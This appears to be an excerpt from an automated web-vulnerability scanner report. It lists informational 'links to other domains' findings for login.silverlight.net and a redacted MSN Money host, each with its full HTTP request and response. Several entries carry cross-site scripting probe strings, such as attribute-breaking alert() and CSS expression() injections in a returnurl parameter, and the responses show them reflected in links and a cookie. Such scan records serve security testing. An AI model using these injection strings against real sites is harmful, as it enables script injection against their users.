Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:32:31 GMT
Content-Length: 12978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296408751&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296408751&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296408751&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.169. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:41:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:31:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296405091&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296405091&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296405091&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.170. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 26

renderableItem=%2Fshow%2F0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:36:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:40 GMT
Content-Length: 13452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343600&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343600&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343600&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.171. http://money.redacted//

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   //

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET //?4ae1b HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/37
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 19:52:48 GMT
ntCoent-Length: 71670
Content-Length: 71670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296417169&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2F%3F4ae1b&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://money.bundle.com/article/study-women-aim-lower-get-paid-less" class="opennew"><img class="portrait" src="http://colstb.msn.com/i/3D/A8BEF8A967A8C44EBA529DF4AF21A.jpg" width="116" height="175" alt="Image: Woman with computer .. Jose Luis Pelaez/Getty Images" />
...[SNIP]...
<div style="margin-right:116px; padding-right: 10px;"><a href="http://money.bundle.com/article/study-women-aim-lower-get-paid-less" class="opennew"><strong>
...[SNIP]...
<div><a href="http://money.bundle.com/categories/" class="opennew"><strong>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/NFCC-ask-debt-expert/" class="opennew">Ask a Debt Expert</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/market-talk/" class="opennew">Market Talk</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/politics-and-market/" class="opennew">Politics &amp; the Markets</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/smart-spending/" class="opennew">Smart Spending</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/women-in-red/" class="opennew">Women in Red</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/your-money/" class="opennew">Your Money</a>
...[SNIP]...
<div style="float:left;width:116px"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&amp;sc_extcmp=JS_2482_money"><img class="portrait" src="http://colstb.msn.com/i/5B/38F85A194EABD1A7A4FE824D213B14.jpg" width="116" height="175" alt="Woman choosing library books (.. Brand X Pictures/Getty Images)" />
...[SNIP]...
<div style="margin-left:116px; padding-left: 10px;"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&amp;sc_extcmp=JS_2482_money"><strong>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2487-Leadership-Management-10-tips-for-managing-the-Facebook-generation/?SiteId=cbmsnmn42487&amp;sc_extcmp=JS_2487_money">Tips for managing 'the Facebook generation'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2484-Salaries-Promotions-What-popular-TV-can-teach-you-about-professional-success/?SiteId=cbmsnmn42484&amp;sc_extcmp=JS_2484_money">What TV can teach you about professional success </a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2486-Leadership-Management-How-not-to-motivate-employees-10-management-habits-to-break-now/?SiteId=cbmsnmn42486&amp;sc_extcmp=JS_2486_money">10 management habits to break now</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2481-Cover-Letters-Resumes-How-to-personalize-your-cover-letter-and-get-the-hiring-managers-attention/?SiteId=cbmsnmn42481&amp;sc_extcmp=JS_2481_money">How to personalize your cover letter</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2480-Workplace-Issues-Lets-do-lunch-Why-a-midday-break-may-make-you-a-better-employee/?SiteId=cbmsnmn42480&amp;sc_extcmp=JS_2480_money">How a lunch break makes you a better employee</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2477-Career-Growth-and-Change-Career-catch-22-How-do-you-get-experience-if-nobody-will-hire-you-without-any/?SiteId=cbmsnmn42477&amp;sc_extcmp=JS_2477_money">No experience? A career catch-22</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2461-Job-Info-and-Trends-I-cant-believe-I-get-paid-to-do-this/?SiteId=cbmsnmn42461&amp;sc_extcmp=JS_2461_money">"I can't believe I get paid to do this"</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.172. http://money.redacted//

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   //

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET //?4ae1b HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/37
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:43 GMT
ntCoent-Length: 71711
Content-Length: 71711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296392203&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2F%3F4ae1b&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://money.bundle.com/article/study-women-aim-lower-get-paid-less" class="opennew"><img class="portrait" src="http://colstb.msn.com/i/3D/A8BEF8A967A8C44EBA529DF4AF21A.jpg" width="116" height="175" alt="Image: Woman with computer .. Jose Luis Pelaez/Getty Images" />
...[SNIP]...
<div style="margin-right:116px; padding-right: 10px;"><a href="http://money.bundle.com/article/study-women-aim-lower-get-paid-less" class="opennew"><strong>
...[SNIP]...
<div><a href="http://money.bundle.com/categories/" class="opennew"><strong>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/NFCC-ask-debt-expert/" class="opennew">Ask a Debt Expert</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/market-talk/" class="opennew">Market Talk</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/politics-and-market/" class="opennew">Politics &amp; the Markets</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/smart-spending/" class="opennew">Smart Spending</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/women-in-red/" class="opennew">Women in Red</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/your-money/" class="opennew">Your Money</a>
...[SNIP]...
<div style="float:left;width:116px"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&amp;sc_extcmp=JS_2482_money"><img class="portrait" src="http://colstb.msn.com/i/5B/38F85A194EABD1A7A4FE824D213B14.jpg" width="116" height="175" alt="Woman choosing library books (.. Brand X Pictures/Getty Images)" />
...[SNIP]...
<div style="margin-left:116px; padding-left: 10px;"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&amp;sc_extcmp=JS_2482_money"><strong>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2487-Leadership-Management-10-tips-for-managing-the-Facebook-generation/?SiteId=cbmsnmn42487&amp;sc_extcmp=JS_2487_money">Tips for managing 'the Facebook generation'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2484-Salaries-Promotions-What-popular-TV-can-teach-you-about-professional-success/?SiteId=cbmsnmn42484&amp;sc_extcmp=JS_2484_money">What TV can teach you about professional success </a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2486-Leadership-Management-How-not-to-motivate-employees-10-management-habits-to-break-now/?SiteId=cbmsnmn42486&amp;sc_extcmp=JS_2486_money">10 management habits to break now</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2481-Cover-Letters-Resumes-How-to-personalize-your-cover-letter-and-get-the-hiring-managers-attention/?SiteId=cbmsnmn42481&amp;sc_extcmp=JS_2481_money">How to personalize your cover letter</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2480-Workplace-Issues-Lets-do-lunch-Why-a-midday-break-may-make-you-a-better-employee/?SiteId=cbmsnmn42480&amp;sc_extcmp=JS_2480_money">How a lunch break makes you a better employee</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2477-Career-Growth-and-Change-Career-catch-22-How-do-you-get-experience-if-nobody-will-hire-you-without-any/?SiteId=cbmsnmn42477&amp;sc_extcmp=JS_2477_money">No experience? A career catch-22</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2461-Job-Info-and-Trends-I-cant-believe-I-get-paid-to-do-this/?SiteId=cbmsnmn42461&amp;sc_extcmp=JS_2461_money">"I can't believe I get paid to do this"</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.173. http://money.redacted//

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   //

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET //?4ae1b HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/37
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
